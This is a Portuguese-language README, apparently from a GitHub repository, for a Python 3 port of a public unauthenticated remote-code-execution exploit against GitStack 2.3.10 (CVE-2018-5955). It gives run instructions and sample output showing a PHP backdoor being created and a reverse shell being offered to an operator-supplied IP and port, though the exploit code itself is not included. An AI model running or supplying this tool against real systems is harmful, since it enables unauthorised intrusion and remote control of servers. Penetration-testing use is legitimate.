Uma exploração para CVE-2018-5955 GitStack 2.3.10 RCE não autenticado
Exploração: GitStack 2.3.10 Execução de código remoto não autenticado
Data: 18.01.2018
Link do software: https://gitstack.com/
Autor de exploração: Kacper Szurek
Exploração original: https://www.exploit-db.com/exploits/43777
Site: https://security.szurek.pl/
Categoria: remoto
CVE: CVE-2018-5955
Data: 23.06.2023
Novos recursos: RCE interativo, detecção do sistema operacional, função reversa da concha, adaptada de python2 para python3
CVE: CVE-2018-5955
Categoria: remoto
Não me responsabilizo por suas ações, pois a publiquei no Github para fins de educação ou testes de penetração certificados e autorizados
Instalar requisitos:
pip install colorama
Então, você pode executá -lo com:
python3 exploit.py
O sistema operacional será detectado depois que você explorar o CVE, de fato haverá esta linha de saída: "[*] OS: $ Operatingsystem" (Dimostração abaixo)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
Você também pode digitar "OS" para descobrir que tipo de sistema operacional é
Para obter um shell reverso real no alvo, você pode digitar "shell" e digitar seu IP e sua porta de escuta assim:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE